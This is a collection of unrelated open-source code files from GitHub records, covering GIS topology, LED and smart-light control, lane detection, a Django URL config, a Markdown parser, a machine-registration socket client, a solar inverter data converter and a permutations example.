self._has_spatial_topology = True\n\n    def set_spatial_topology_build_false(self):\n        \"\"\"Same as name\"\"\"\n        self._has_spatial_topology = False\n\n    def is_spatial_topology_build(self):\n        \"\"\"Check if the spatial topology was built\"\"\"\n        return self._has_spatial_topology\n\n    def append_equivalent(self, map):\n        \"\"\"Append a map with equivalent spatial extent as this map\n\n        :param map: This object should be of type AbstractMapDataset\n                    or derived classes\n        \"\"\"\n        if \"EQUIVALENT\" not in self._spatial_topology:\n            self._spatial_topology[\"EQUIVALENT\"] = []\n        self._spatial_topology[\"EQUIVALENT\"].append(map)\n\n    def get_equivalent(self):\n        \"\"\"Return a list of map objects with equivalent spatial extent as this map\n\n        :return: A list of map objects or None\n        \"\"\"\n        if \"EQUIVALENT\" not in self._spatial_topology:\n            return None\n        return self._spatial_topology[\"EQUIVALENT\"]\n\n    def append_overlap(self, map):\n        \"\"\"Append a map that spatially overlaps with this map\n\n        :param map: This object should be of type AbstractMapDataset\n                    or derived classes\n        \"\"\"\n        if \"OVERLAP\" not in self._spatial_topology:\n            self._spatial_topology[\"OVERLAP\"] = []\n        self._spatial_topology[\"OVERLAP\"].append(map)\n\n    def get_overlap(self):\n        \"\"\"Return a list of map objects that this map spatially overlaps with\n\n        :return: A list of map objects or None\n        \"\"\"\n        if \"OVERLAP\" not in self._spatial_topology:\n            return None\n        return self._spatial_topology[\"OVERLAP\"]\n\n    def append_in(self, map):\n        \"\"\"Append a map that is spatially in this map\n\n        :param map: This object should be of type AbstractMapDataset\n                    or derived classes\n        \"\"\"\n        if \"IN\" not in self._spatial_topology:\n            self._spatial_topology[\"IN\"] = []\n        self._spatial_topology[\"IN\"].append(map)\n\n    def get_in(self):\n        \"\"\"Return a list of map objects that are spatially in this map\n\n        :return: A list of map objects or None\n        \"\"\"\n        if \"IN\" not in self._spatial_topology:\n            return None\n        return self._spatial_topology[\"IN\"]\n\n    def append_contain(self, map):\n        \"\"\"Append a map that this map spatially contains\n\n        :param map: This object should be of type AbstractMapDataset\n                    or derived classes\n        \"\"\"\n        if \"CONTAIN\" not in self._spatial_topology:\n            self._spatial_topology[\"CONTAIN\"] = []\n        self._spatial_topology[\"CONTAIN\"].append(map)\n\n    def get_contain(self):\n        \"\"\"Return a list of map objects that this map contains\n\n        :return: A list of map objects or None\n        \"\"\"\n        if \"CONTAIN\" not in self._spatial_topology:\n            return None\n        return self._spatial_topology[\"CONTAIN\"]\n\n    def append_meet(self, map):\n        \"\"\"Append a map that spatially meets with this map\n\n        :param map: This object should be of type AbstractMapDataset\n                    or derived classes\n        \"\"\"\n        if \"MEET\" not in self._spatial_topology:\n            self._spatial_topology[\"MEET\"] = []\n        self._spatial_topology[\"MEET\"].append(map)\n\n    def get_meet(self):\n        \"\"\"Return a list of map objects that spatially meet with this map\n\n        :return: A list of map objects or None\n        \"\"\"\n        if \"MEET\" not in self._spatial_topology:\n            return None\n        return self._spatial_topology[\"MEET\"]\n\n    def append_cover(self, map):\n        \"\"\"Append a map that spatially covers this map\n\n        :param map: This object should be of type AbstractMapDataset\n                    or derived classes\n        \"\"\"\n        if \"COVER\" not in self._spatial_topology:\n            self._spatial_topology[\"COVER\"] = []\n        self._spatial_topology[\"COVER\"].append(map)\n\n    def get_cover(self):\n        \"\"\"Return a list of map objects that 
spatially cover this map\n\n :return: A list of map objects or None\n \"\"\"\n if \"COVER\" not in self._spatial_topology:\n return None\n return self._spatial_topology[\"COVER\"]\n\n def append_covered(self, map):\n \"\"\"Append a map that is spatially covered by this map\n\n :param map: This object should be of type AbstractMapDataset\n or derived classes\n \"\"\"\n if \"COVERED\" not in self._spatial_topology:\n self._spatial_topology[\"COVERED\"] = []\n self._spatial_topology[\"COVERED\"].append(map)\n\n def get_covered(self):\n \"\"\"Return a list of map objects that are spatially covered by this map\n\n :return: A list of map objects or None\n \"\"\"\n if \"COVERED\" not in self._spatial_topology:\n return None\n return self._spatial_topology[\"COVERED\"]\n\n def _generate_map_list_string(self, map_list, line_wrap=True):\n count = 0\n string = \"\"\n for map_ in map_list:\n if line_wrap and count > 0 and count % 3 == 0:\n string += \"\\n | ............................ \"\n count = 0\n if count == 0:\n string += map_.get_id()\n else:\n string += \",%s\" % map_.get_id()\n count += 1\n\n return string\n\n # Set the properties\n equivalent = property(fget=get_equivalent, fset=append_equivalent)\n cover = property(fget=get_cover, fset=append_cover)\n covered = property(fget=get_covered, fset=append_covered)\n overlap = property(fget=get_overlap, fset=append_overlap)\n in_ = property(fget=get_in, fset=append_in)\n contain = property(fget=get_contain, fset=append_contain)\n meet = property(fget=get_meet, fset=append_meet)\n\n def print_spatial_topology_info(self):\n \"\"\"Print information about this class in human readable style\"\"\"\n\n print(\n \" +-------------------- Spatial Topology --------------------------------------+\"\n )\n # 0123456789012345678901234567890\n if self.equivalent is not None:\n print(\n \" | Equivalent: ................ \"\n + self._generate_map_list_string(self.equivalent)\n )\n if self.cover is not None:\n print(\n \" | Cover: ..................... \"\n + self._generate_map_list_string(self.cover)\n )\n if self.covered is not None:\n print(\n \" | Covered: ................... \"\n + self._generate_map_list_string(self.covered)\n )\n if self.overlap is not None:\n print(\n \" | Overlap: ................... \"\n + self._generate_map_list_string(self.overlap)\n )\n if self.in_ is not None:\n print(\n \" | In: ........................ \"\n + self._generate_map_list_string(self.in_)\n )\n if self.contain is not None:\n print(\n \" | Contain: ................... \"\n + self._generate_map_list_string(self.contain)\n )\n if self.meet is not None:\n print(\n \" | Meet: ...................... 
\"\n + self._generate_map_list_string(self.meet)\n )\n\n def print_spatial_topology_shell_info(self):\n \"\"\"Print information about this class in shell style\"\"\"\n\n if self.equivalent is not None:\n print(\n \"equivalent=\" + self._generate_map_list_string(self.equivalent, False)\n )\n if self.cover is not None:\n print(\"cover=\" + self._generate_map_list_string(self.cover, False))\n if self.covered is not None:\n print(\"covered=\" + self._generate_map_list_string(self.covered, False))\n if self.overlap is not None:\n print(\"overlap=\" + self._generate_map_list_string(self.overlap))\n if self.in_ is not None:\n print(\"in=\" + self._generate_map_list_string(self.in_))\n if self.contain is not None:\n print(\"contain=\" + self._generate_map_list_string(self.contain))\n if self.meet is not None:\n print(\"meet=\" + self._generate_map_list_string(self.meet))\n\n\n###############################################################################\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n","repo_name":"OSGeo/grass","sub_path":"python/grass/temporal/spatial_topology_dataset_connector.py","file_name":"spatial_topology_dataset_connector.py","file_ext":"py","file_size_in_byte":12811,"program_lang":"python","lang":"en","doc_type":"code","stars":687,"dataset":"github-code","pt":"19"} +{"seq_id":"72184167723","text":"import board\nimport time\nimport neopixel\n\npixel_pin = board.A2\nnum_pixels = 8\n\npixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=0.05, auto_write=False)\n\nRED = (255, 0, 0)\nORANGE = (255, 128, 0)\nYELLOW = (255, 255, 0)\nGREEN = (0, 255, 0)\nCYAN = (0, 255, 255)\nBLUE = (0, 0, 255)\nPURPLE = (180, 0, 255)\nWHITE = (255, 255, 255)\n\nwhile True:\n pixels.fill(PURPLE)\n pixels.show()\n time.sleep(1)\n","repo_name":"knrdsps/spj_circuitpython","sub_path":"lesson4_neopixel_single_colour.py","file_name":"lesson4_neopixel_single_colour.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13305246075","text":"from PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nfrom detect import detect_lane_lines\nfrom distortion import Distortion\nfrom image_helper import rgb_image\nfrom birdseye import BirdsEyeView\nfrom lane import Lane\nimport cv2\nimport glob\nimport numpy as np\nimport combined_thresholds\nimport matplotlib.pyplot as plt\n\ndef overlay_text(image, text, pos=(0, 0), color=(255, 255, 255)):\n image = Image.fromarray(image)\n draw = ImageDraw.Draw(image)\n font = ImageFont.truetype(\"./fonts/LucidaBrightRegular.ttf\", 64)\n draw.text(pos, text, color, font=font)\n image = np.asarray(image)\n\n return image\n\ndef overlay_lane(image, left_fit, right_fit, birdseye):\n left_ys = np.linspace(0, 100, num=101) * 7.2\n left_xs = left_fit[0]*left_ys**2 + left_fit[1]*left_ys + left_fit[2]\n\n right_ys = np.linspace(0, 100, num=101) * 7.2\n right_xs = right_fit[0]*right_ys**2 + right_fit[1]*right_ys + right_fit[2]\n\n color_warp = np.zeros_like(image).astype(np.uint8)\n\n pts_left = np.array([np.transpose(np.vstack([left_xs, left_ys]))])\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_xs, right_ys])))])\n pts = np.hstack((pts_left, pts_right))\n\n cv2.fillPoly(color_warp, np.int_([pts]), (0, 0, 255))\n newwarp = cv2.warpPerspective(color_warp, birdseye.inverse_transform_matrix(), (image.shape[1], image.shape[0]))\n newwarp = birdseye.transform_from_birdseye(color_warp, image)\n\n return cv2.addWeighted(image, 
1, newwarp, 0.3, 0)\n\ndef overlay_detected_lane_data(image, lanes, birdseye):\n height, width, _ = image.shape\n\n image = overlay_lane(image, lanes.left.pixels.fit, lanes.right.pixels.fit, birdseye)\n image = overlay_text(image, \"Left curvature: {0:.2f}m\".format(lanes.left.meters.curvature(height)), pos=(10, 10))\n image = overlay_text(image, \"Right curvature: {0:.2f}m\".format(lanes.right.meters.curvature(height)), pos=(10, 90))\n image = overlay_text(image, \"Vehicle offset: {0:.2f}m\".format(lanes.distance_from_center((width/2, height))), pos=(10, 170))\n\n return image\n\nclass OverlayDetectedLaneData:\n def __init__(self, birdseye):\n self.birdseye = birdseye\n\n def draw_overlays(self, image, lanes):\n return overlay_detected_lane_data(\n image=image,\n lanes=lanes,\n birdseye=self.birdseye)\n\nif __name__ == \"__main__\":\n np.seterr(all='ignore')\n\n birdseye = BirdsEyeView()\n distortion = Distortion(calibration_data_filepath=\"./camera_cal/wide_dist_pickle.p\")\n overlay = OverlayDetectedLaneData(birdseye=birdseye)\n\n images_glob = glob.glob(\"./test_images/test1.jpg\")\n\n for filepath in images_glob:\n image = rgb_image(filepath)\n bin_image = distortion.undistort(image)\n bin_image = birdseye.transform_to_birdseye(bin_image)\n bin_image, gb = combined_thresholds.pipeline(bin_image)\n\n lanes, _ = detect_lane_lines(bin_image)\n output_image = overlay.draw_overlays(image, lanes)\n\n plt.imshow(output_image)\n plt.show()\n","repo_name":"matttpj/CarND-Advanced-Lane-Lines","sub_path":"overlay.py","file_name":"overlay.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8134033120","text":"import random\nfrom lifxlan import Light, BLUE, RED\n\nkelvin = 4500\ntransition_time = 3000\n\nclass Light(Light):\n\n ##\n # flame effect when drawing above max power from the grid\n def flame_on(self):\n print('flame_on')\n self.set_color(RED, transition_time)\n\n ##\n # blizzard effect when feeding in above max power to the grid\n def blizzard(self):\n print('snap_freeze')\n self.set_color(BLUE, transition_time)\n\n ##\n # hot colours, for when you're drawing power from the grid\n # intensity - number between 0 - 100 indicating how much power\n # the house is drawing from the grid\n # magnitude - number beween 0 - 100 indicating the total amount\n # of power the house is using, grid + solar\n def set_heat(self, intensity, magnitude):\n print(f\"set_heat {intensity} : {magnitude}\")\n start_hue = 64 # yellow\n end_hue = 0 # red\n\n hue = ((start_hue - (intensity * (start_hue/100)))/360) * 65535\n saturation = 65535\n brightness = 65535 * (magnitude/100)\n colour = [hue, saturation, brightness, kelvin]\n print(colour)\n self.set_color(colour, transition_time)\n # yellow - orange - red - flames!\n # hue 64 -- 0\n\n def set_cool(self, intensity, magnitude):\n print(f\"set_cool {intensity} : {magnitude}\")\n start_hue = 128 # green\n end_hue = 256 # blue\n\n hue = ((start_hue + (intensity * (end_hue - start_hue)/100))/360) * 65535\n saturation = 65535\n brightness = 65535 * (magnitude/100)\n colour = [hue, saturation, brightness, kelvin]\n print(colour)\n self.set_color(colour, transition_time)\n # green - cyan - blue - purple/blue\n # hue 128 -- 256\n\n def set_white(self, magnitude):\n print(f\"set white {magnitude}\")\n\n brightness = 65535 * (magnitude/100)\n colour = [58275, 0, brightness, kelvin]\n self.set_color(colour, 
transition_time)\n","repo_name":"shabadoo75/solar_monitor_globe","sub_path":"lifxpwrmtr.py","file_name":"lifxpwrmtr.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10844850947","text":"from django.urls import path\nfrom app2.views import *\nfrom django.contrib.auth.views import LogoutView\n\nurlpatterns = [\n path('accounts/signup/', register_account, name=\"REGISTER\"),\n path('accounts/login/', login_account, name=\"LOGIN\"),\n path('login_exitoso/', succesful_login, name=\"SUCCESFUL_LOGIN\"),\n path('logout/', LogoutView.as_view(template_name=\"app2/log-out.html\"), name=\"LOGOUT\"),\n path('accounts/profile/', profile, name=\"PROFILE\"),\n path('accounts/profile2/', profile2, name=\"PROFILE2\")\n]\n","repo_name":"Ignacio-Serda/Proyecto-Final---Serda_Barrientos","sub_path":"app2/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"42903246061","text":"import re\nimport unicodedata\nfrom typing import Any\n\nfrom docutils import nodes\nfrom docutils.nodes import Element, Text\n\nfrom pycmark import addnodes\nfrom pycmark.inlineparser import PatternInlineProcessor, UnmatchedTokenError, backtrack_onerror\nfrom pycmark.readers import TextReader\nfrom pycmark.utils import entitytrans, normalize_uri\nfrom pycmark.utils import OPENTAG, CLOSETAG, escaped_chars_pattern\n\n\ndef is_punctuation(char: str) -> bool:\n return 'P' in unicodedata.category(char)\n\n\n# 6.1 Backslash escapes\nclass BackslashEscapeProcessor(PatternInlineProcessor):\n pattern = escaped_chars_pattern\n\n def run(self, reader: TextReader, document: Element) -> bool:\n document += addnodes.SparseText(reader.subject, reader.position + 1, reader.position + 2)\n reader.step(2)\n return True\n\n\n# 6.2 Entity and numeric character references\nclass EntityReferenceProcessor(PatternInlineProcessor):\n pattern = re.compile(r'&(?:\\w{1,32}|#\\d{1,7}|#[xX][0-9A-Fa-f]{1,6});')\n\n def run(self, reader: TextReader, document: Element) -> bool:\n text = reader.consume(self.pattern).group(0)\n document += Text(entitytrans._unescape(text))\n return True\n\n\n# 6.3 Code spans\nclass CodeSpanProcessor(PatternInlineProcessor):\n pattern = re.compile(r'`+')\n\n @backtrack_onerror\n def run(self, reader: TextReader, document: Element) -> bool:\n marker = reader.consume(self.pattern).group(0)\n\n pattern = re.compile(marker + r\"([^`]|$)\")\n text = addnodes.SparseText(reader.remain, 0, 0)\n while reader.remain:\n if pattern.match(reader.remain):\n code = re.sub(r'[\\r\\n]', ' ', str(text), re.S)\n code = self.trim_single_space(code)\n document += nodes.literal(code, code)\n reader.step(len(marker))\n return True\n elif reader.remain[0] == '`':\n while reader.remain and reader.remain[0] == '`':\n text.spread(end=1)\n reader.step()\n else:\n text.spread(end=1)\n reader.step()\n else:\n raise UnmatchedTokenError(marker)\n\n def trim_single_space(self, s: str) -> str:\n return re.sub('^ (.+) $', r'\\1', s)\n\n\n# 6.4 Emphasis and strong emphasis\nclass EmphasisProcessor(PatternInlineProcessor):\n pattern = re.compile(r'(\\*+|_+)')\n whitespaces = re.compile(r'\\s|0xa0')\n\n def run(self, reader: TextReader, document: Element) -> bool:\n if reader.position == 0:\n before_is_whitespace: Any = True\n before_is_punctuation: Any = False\n else:\n before = reader[reader.position - 1]\n before_is_whitespace = 
self.whitespaces.match(before)\n before_is_punctuation = is_punctuation(before)\n\n marker = reader.consume(self.pattern).group(0)\n\n if reader.remain:\n after = reader.remain[0]\n after_is_whitespace: Any = self.whitespaces.match(after)\n after_is_punctuation: Any = is_punctuation(after)\n else:\n after_is_whitespace = True\n after_is_punctuation = False\n\n left_flanking = (not after_is_whitespace and\n (not after_is_punctuation or\n before_is_whitespace or\n before_is_punctuation))\n right_flanking = (not before_is_whitespace and\n (not before_is_punctuation or\n after_is_whitespace or\n after_is_punctuation))\n\n if marker[0] == '_':\n can_open = (left_flanking and\n (not right_flanking or before_is_punctuation))\n can_close = (right_flanking and\n (not left_flanking or after_is_punctuation))\n else:\n can_open = left_flanking\n can_close = right_flanking\n\n document += addnodes.emphasis(marker=marker, can_open=can_open, can_close=can_close,\n orig_length=len(marker), curr_length=len(marker),\n interior=can_open and can_close)\n return True\n\n\n# 6.7 Autolinks\nclass URIAutolinkProcessor(PatternInlineProcessor):\n pattern = re.compile(r'<([a-z][a-z0-9+.-]{1,31}:[^<>\\x00-\\x20]*)>', re.I)\n\n def run(self, reader: TextReader, document: Element) -> bool:\n uri = reader.consume(self.pattern).group(1)\n document += nodes.reference(uri, uri, refuri=normalize_uri(uri))\n return True\n\n\nclass EmailAutolinkProcessor(PatternInlineProcessor):\n pattern = re.compile(r'<([a-zA-Z0-9.!#$%&\\'*+/=?^_`{|}~-]+@[a-zA-Z0-9]'\n r'(?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?'\n r'(?:\\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*)>')\n\n def run(self, reader: TextReader, document: Element) -> bool:\n uri = reader.consume(self.pattern).group(1)\n document += nodes.reference(uri, uri, refuri='mailto:' + normalize_uri(uri))\n return True\n\n\n# 6.8 Raw HTML\nclass RawHTMLProcessor(PatternInlineProcessor):\n HTML_COMMENT = r'|'\n PROCESSING_INSTRUCTION = r\"<\\?.*?\\?>\"\n DECLARATION = r\"]*>\"\n CDATA = r''\n HTMLTAG = (\"(?:\" + OPENTAG + \"|\" + CLOSETAG + \"|\" + HTML_COMMENT + \"|\" +\n PROCESSING_INSTRUCTION + \"|\" + DECLARATION + \"|\" + CDATA + \")\")\n pattern = re.compile(HTMLTAG)\n\n def run(self, reader: TextReader, document: Element) -> bool:\n html = reader.consume(self.pattern).group(0)\n document += nodes.raw(html, html, format='html')\n return True\n\n\n# 6.9 Hard line breaks\nclass HardLinebreakProcessor(PatternInlineProcessor):\n pattern = re.compile(r'( {2,}|\\\\)\\n')\n\n def run(self, reader: TextReader, document: Element) -> bool:\n if not isinstance(document, nodes.paragraph):\n return False\n else:\n reader.consume(self.pattern)\n document += addnodes.linebreak()\n return True\n\n\n# 6.10 Soft line breaks\nclass SoftLinebreakProcessor(PatternInlineProcessor):\n pattern = re.compile(r'\\s(?=\\n)')\n\n def run(self, reader: TextReader, document: Element) -> bool:\n if not isinstance(document, nodes.paragraph):\n return False\n else:\n reader.consume(self.pattern) # skip over a space at tail\n document += addnodes.SparseText(reader.subject, reader.position, reader.position)\n return True\n","repo_name":"pycmark/pycmark","sub_path":"pycmark/inlineparser/std_processors.py","file_name":"std_processors.py","file_ext":"py","file_size_in_byte":6560,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"25167304029","text":"# coding:utf-8\nimport socket\nimport json\nimport time\nimport threading\n# from oracle import 
oracle_handler\nfrom time import sleep, ctime\nimport multiprocessing\n# from data_vb_vs import *\nimport data_vb_vs\nfrom datetime import datetime\nimport os\n\n\n# open a socket connection\nip_port = ('47.94.179.118', 8031)# define the port number and IP address\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)# enable TCP keep-alive\nclient.connect(ip_port)# connect\n\n# socket registration and heartbeat maintenance method\ndef send_message(innerCode,key):\n\tmessage=data_vb_vs.register_data(innerCode,key)# build a message that registers this machine\n\tclient.sendall(message)# send the message to the server\n\t# res=client.recv(1024)\n\t# print(res,ctime())\n\twhile True:\n\t\t# print('hh')\n\t\tmessage1=data_vb_vs.heart_data(innerCode)# build a heartbeat message\n\t\tclient.sendall(message1)# send the heartbeat to the server\n\t\t# ret=client.recv(1024)\n\t\t# print(message1)\n\t\ttime.sleep(50)# sleep for 50s\n\n# method that receives socket messages\ndef reserve_messsage():\n\twhile True:\n\t\t# time.sleep(7)\n\t\treturnMessage=client.recv(40000)# receive everything the socket returns into returnMessage\n\t\tif not returnMessage == '':# if the returned message is not empty\n\t\t\tmessage_string_list = returnMessage.decode('utf8').split('\n')# decode the bytes to text, then split on '\n' into a list\n\t\t\tprint(message_string_list, ctime())\n\t\t\tfor message_finaly in message_string_list:# loop over the messages in the list\n\t\t\t\tif not message_finaly == '':# if the message is not empty\n\t\t\t\t\thasInnerCode = message_finaly.find(\"innerCode\")# check whether the message has an \"innerCode\" field\n\t\t\t\t\thasMsgType = message_finaly.find(\"msgType\")# check whether the message has a \"msgType\" field\n\t\t\t\t\tif hasInnerCode < 0 or hasMsgType < 0:# if message_finaly lacks \"innerCode\" or \"msgType\", break out of the loop\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\tmessageRes = json.loads(message_finaly)# otherwise parse message_finaly into a dict\n\t\t\t\t\t\tif not messageRes['data'] == '':# if messageRes['data'] is not empty\n\t\t\t\t\t\t\tif not messageRes['data']['msgType'] == 'heart':# if the received message is not a heartbeat\n\t\t\t\t\t\t\t\tif messageRes['data']['msgType'] == 'ask' or messageRes['data']['msgType'] == 'outSku':# if the message type is 'ask' or 'outSku'\n\t\t\t\t\t\t\t\t\t# time.sleep(7)# an optional delay could go here\n\t\t\t\t\t\t\t\t\tsn = messageRes['sn']# take the sn from the received message\n\t\t\t\t\t\t\t\t\tmessageSend = data_vb_vs.commenResponse_data(sn)# build the response payload from the message\n\t\t\t\t\t\t\t\t\tprint(messageSend, ctime())\n\t\t\t\t\t\t\t\t\tclient.sendall(messageSend)# send the processed response\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t# any other message type\n\t\t\t\t\t\t\t\t\tsn = messageRes['sn']# get the sn\n\t\t\t\t\t\t\t\t\tmessageSend = data_vb_vs.commenResponse_data(sn)# build the response payload\n\t\t\t\t\t\t\t\t\tprint(messageSend, ctime())\n\t\t\t\t\t\t\t\t\tclient.sendall(messageSend)# send the data\n\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t# heartbeat messages can simply be ignored\n\t\t\t\t\t\t\t\tpass\n\n# run the two methods on separate threads\ndef test(innercode,key):\n\tthreads=[]# empty list for the thread group\n\tt1=threading.Thread(target=send_message,args=(innercode,key))# create thread t1 running send_message\n\tthreads.append(t1)# add t1 to the threads list\n\tt2=threading.Thread(target=reserve_messsage)# create thread t2 running reserve_messsage\n\tthreads.append(t2)# add t2 to the threads list\n\n\tfor t in range(0,len(threads)):\n\t\t# start every thread in the group\n\t\tthreads[t].start()\n\tfor t in range(0, len(threads)):\n\t\t# wait for every thread in the group\n\t\tthreads[t].join()\n\nif __name__ == '__main__':\n\t# the call takes two arguments: the machine number and the key\n\ttest('01000003',\"c3afea0993ce30e566ada5f967488105c3afea0993ce30e566ada5f967488105\")\n\n\n","repo_name":"yangxue198749/Testscript","sub_path":"sckt.py","file_name":"sckt.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8955239008","text":"\"\"\"\n'growatt' is the inverter for the solar
panels.\n\nExample:\n    {\n        \"energy_today_high\": 0.0,\n        \"energy_today_low\": 34196.0,\n        \"energy_high\": 1.0,\n        \"energy_low\": 34196.0,\n        \"epv_today_high\": 0.0,\n        \"epv_today_low\": 61164.0,\n        \"epv_high\": 0.0,\n        \"epv_low\": 61164.0,\n        \"worktime_high\": 712.0,\n        \"worktime_low\": 59344.0,\n        \"active\": 255.0,\n        \"reactive\": 255.0,\n        \"voltage\": 6000.0,\n        \"pf\": 65535.0,\n        \"phigh\": 0.0,\n        \"plow\": 60000.0,\n        \"state\": 1.0,\n        \"input_high\": 0.0,\n        \"input_low\": 2377.0,\n        \"pv1_voltage\": 3371.0,\n        \"pv1_current\": 4.0,\n        \"pv1_power_high\": 0.0,\n        \"pv1_power_low\": 1348.0,\n        \"pv2_voltage\": 2573.0,\n        \"pv2_current\": 4.0,\n        \"pv2_power_high\": 0.0,\n        \"pv2_power_low\": 1029.0,\n        \"output_high\": 0.0,\n        \"output_low\": 2077.0,\n        \"grid_freq\": 4999.0,\n        \"grid_voltage\": 2382.0,\n        \"grid_current\": 3.0,\n        \"grid_output_high\": 0.0,\n        \"grid_output_low\": 714.0,\n        \"grid_voltage_2\": 2388.0,\n        \"grid_current_2\": 3.0,\n        \"grid_output_2_high\": 0.0,\n        \"grid_output_2_low\": 716.0,\n        \"grid_voltage_3\": 2385.0,\n        \"grid_current_3\": 3.0,\n        \"grid_output_3_high\": 0.0,\n        \"grid_output_3_low\": 715.0,\n        \"fault_iso\": 0.0,\n        \"fault_gfci\": 0.0,\n        \"fault_dci\": 0.0,\n        \"fault_pv\": 0.0,\n        \"fault_ac_volt\": 0.0,\n        \"fault_ac_freq\": 0.0,\n        \"fault_temperature\": 0.0,\n        \"fault_code\": 0.0,\n        \"temperature\": 411.0\n    }\n\nFault values are of no real interest, and there are a few values that are\nnearly always fixed. Next to the values given, also create a few values that\nare a combination of them, to make graphs easier later on.\n\n'total' values appear to be corrupted. This already happens on the Modbus. So\nwe have to ignore those values, and start fresh every day with counting.\n\n'epv_' values are only of pv1, not of pv2 or the combination. As such, they\nare not usable.
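This is a mistake in the code of Homij.\n\nEvery 32-bit counter arrives split into a high and a low 16-bit register;\nget_high_low() below recombines such pairs as (high << 16) | low. With the\nexample values above, pv1_power becomes (0 << 16) | 1348 = 1348, i.e. 134.8 W\nonce the /10 scaling is applied.\n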
\nstate:\n    0 = waiting\n    1 = normal\n    3 = fault\n\"\"\"\n\n\ndef get_high_low(data, label):\n    return (int(data[f\"{label}_high\"]) << 16) | int(data[f\"{label}_low\"])\n\n\ndef convert_measurement(data):\n    payload = {\n        \"growatt_state\": {\n            \"value\": data[\"state\"],\n            \"unit\": \"enum\",\n        },\n        \"growatt_temperature\": {\n            \"value\": data[\"temperature\"] / 10,\n            \"unit\": \"celcius\",\n        },\n        \"growatt_grid_energy_today\": {\n            \"value\": get_high_low(data, \"energy_today\") / 10,\n            \"unit\": \"kWh\",\n        },\n        \"growatt_pv_voltage_1\": {\n            \"value\": data[\"pv1_voltage\"] / 10,\n            \"unit\": \"V\",\n        },\n        \"growatt_pv_voltage_2\": {\n            \"value\": data[\"pv2_voltage\"] / 10,\n            \"unit\": \"V\",\n        },\n        \"growatt_pv_voltage\": {\n            \"value\": (data[\"pv1_voltage\"] + data[\"pv2_voltage\"]) / 2 / 10,\n            \"unit\": \"V\",\n        },\n        \"growatt_pv_current_1\": {\n            \"value\": data[\"pv1_current\"] / 10,\n            \"unit\": \"A\",\n        },\n        \"growatt_pv_current_2\": {\n            \"value\": data[\"pv2_current\"] / 10,\n            \"unit\": \"A\",\n        },\n        \"growatt_pv_current\": {\n            \"value\": (data[\"pv1_current\"] + data[\"pv2_current\"]) / 2 / 10,\n            \"unit\": \"A\",\n        },\n        \"growatt_pv_energy_1\": {\n            \"value\": get_high_low(data, \"pv1_power\") / 10,\n            \"unit\": \"W\",\n        },\n        \"growatt_pv_energy_2\": {\n            \"value\": get_high_low(data, \"pv2_power\") / 10,\n            \"unit\": \"W\",\n        },\n        \"growatt_pv_energy\": {\n            \"value\": get_high_low(data, \"input\") / 10,\n            \"unit\": \"W\",\n        },\n        \"growatt_grid_freq\": {\n            \"value\": data[\"grid_freq\"] / 100,\n            \"unit\": \"Hz\",\n        },\n        \"growatt_grid_voltage_1\": {\n            \"value\": data[\"grid_voltage\"] / 10,\n            \"unit\": \"V\",\n        },\n        \"growatt_grid_voltage_2\": {\n            \"value\": data[\"grid_voltage_2\"] / 10,\n            \"unit\": \"V\",\n        },\n        \"growatt_grid_voltage_3\": {\n            \"value\": data[\"grid_voltage_3\"] / 10,\n            \"unit\": \"V\",\n        },\n        \"growatt_grid_voltage\": {\n            \"value\": (data[\"grid_voltage\"] + data[\"grid_voltage_2\"] + data[\"grid_voltage_3\"]) / 3 / 10,\n            \"unit\": \"V\",\n        },\n        \"growatt_grid_current_1\": {\n            \"value\": data[\"grid_current\"] / 10,\n            \"unit\": \"A\",\n        },\n        \"growatt_grid_current_2\": {\n            \"value\": data[\"grid_current_2\"] / 10,\n            \"unit\": \"A\",\n        },\n        \"growatt_grid_current_3\": {\n            \"value\": data[\"grid_current_3\"] / 10,\n            \"unit\": \"A\",\n        },\n        \"growatt_grid_current\": {\n            \"value\": (data[\"grid_current\"] + data[\"grid_current_2\"] + data[\"grid_current_3\"]) / 3 / 10,\n            \"unit\": \"A\",\n        },\n        \"growatt_grid_energy_1\": {\n            \"value\": get_high_low(data, \"grid_output\") / 10,\n            \"unit\": \"W\",\n        },\n        \"growatt_grid_energy_2\": {\n            \"value\": get_high_low(data, \"grid_output_2\") / 10,\n            \"unit\": \"W\",\n        },\n        \"growatt_grid_energy_3\": {\n            \"value\": get_high_low(data, \"grid_output_3\") / 10,\n            \"unit\": \"W\",\n        },\n        \"growatt_grid_energy\": {\n            \"value\": get_high_low(data, \"output\") / 10,\n            \"unit\": \"W\",\n        },\n    }\n\n    return payload\n","repo_name":"TrueBrain/homij_mitm","sub_path":"homij_mitm/converters/growatt.py","file_name":"growatt.py","file_ext":"py","file_size_in_byte":5547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41055950506","text":"# Permutations and combinations\n\n\n## Permutation: choosing r distinct items out of n distinct items and arranging them in a row.\n### 'abc' 'acb' 'bac' 'bca' 'cab' 'cba'\n\nfrom itertools import permutations\n\ndata = ['a', 'b', 'c']\n\nresult = list(permutations(data, 3))\nprint(result)\n\n
